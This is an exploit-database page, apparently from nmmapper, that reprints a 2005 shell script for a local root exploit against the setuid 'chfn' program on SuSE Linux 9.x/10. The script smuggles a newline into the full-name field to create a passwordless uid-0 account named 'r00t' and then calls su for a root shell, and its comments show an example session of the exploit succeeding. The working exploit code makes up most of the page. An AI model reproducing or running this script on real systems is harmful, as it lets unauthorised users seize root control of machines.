Search for hundreds of thousands of exploits

"Linux chfn (SuSE 9.3/10) - Local Privilege Escalation"

Author

Exploit author

Hunger

Platform

Exploit platform

linux

Release date

Exploit published date

2005-11-08

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/bin/sh
#
# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
# 
# by Hunger <susechfn@hunger.hu>
#
# Advistory:
# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
# 
# hunger@suse:~> id
# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
# hunger@suse:~> ./susechfn.sh
# Type your current password to get root... :)
# Password:
# sh-2.05b# id
# uid=0(r00t) gid=0(root) groups=0(root)

if [ X"$SHELL" = "X" ]; then
	echo "No SHELL environment, using /bin/sh for default."
	export SHELL=/bin/sh
fi

if [ -u /usr/bin/chfn ]; then
	/bin/echo "Type your current password to get root... :)"
	/usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null
	if [ -u /bin/su ]; then
		/bin/su r00t
		/bin/echo "You can get root again with 'su r00t'"
	else 
		echo "/bin/su file is not setuid root :("
	fi
else
echo "/usr/bin/chfn file is not setuid root :("
fi

# milw0rm.com [2005-11-08]
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/1299/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.